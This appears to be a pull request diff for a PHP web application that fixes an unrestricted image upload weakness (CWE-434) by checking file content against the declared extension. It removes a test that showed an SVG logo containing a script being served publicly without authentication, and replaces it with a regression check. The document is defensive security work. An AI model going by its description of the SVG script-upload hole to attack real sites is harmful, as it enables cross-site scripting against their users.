@@ -81,19 +73,6 @@ SVG;
             'logo' => $file,
         ]);
 
-        // Get the company to find logo filename
-        $updatedCompany = $company->fresh();
-        $logoPath = '/storage/company/'.str_slug($company->name, '_').'/'.$updatedCompany->logo;
-
-        // Access logo WITHOUT authentication in a fresh session (no cookies)
-        $response = $this->get($logoPath);
-
-        echo "\n✓ Logo is publicly accessible without authentication\n";
-        echo '  URL: '.$logoPath."\n";
-        echo '  Status: '.$response->status()."\n";
-
-        // The vulnerability: file is publicly accessible
-        $this->assertEquals(200, $response->status(), 'Logo should be publicly accessible without auth');
-        $this->assertStringContainsString('<script', $response->content());
+        $this->assertNull($company->fresh()->logo);
     }
 }

--- a/version.php
+++ b/version.php
@@ -1,3 +1,3 @@
 <?php
 
-const APP_VERSION = '5.15.13';
+const APP_VERSION = '5.16.0';


### PR DESCRIPTION
…CWE-434)

Validate that the client-declared extension of uploaded images matches the actual content type (magic bytes). On mismatch the upload is rejected and a security incident is logged (ip, user, request context) to a dedicated security log channel. Stored filenames now use the content-derived extension instead of the attacker-controlled one.

Also includes test fixes: IDOR cross-company update now expects 403, the stale SVG logo XSS tests are converted into regression tests, and the company save test no longer depends on a polluted fake-disk root.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **New Features**
  - Added stronger validation for product, profile, and company image uploads by checking file extensions against their actual content.
  - Added security incident logging for suspicious upload attempts.
  - Updated the application version to 5.16.0.

- **Bug Fixes**
  - Malicious or mismatched image uploads are now rejected and not stored.
  - Unauthorized cross-company profile updates now return a forbidden response.

- **Style**
  - Improved currency table readability with striped rows and more flexible amount column sizing.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->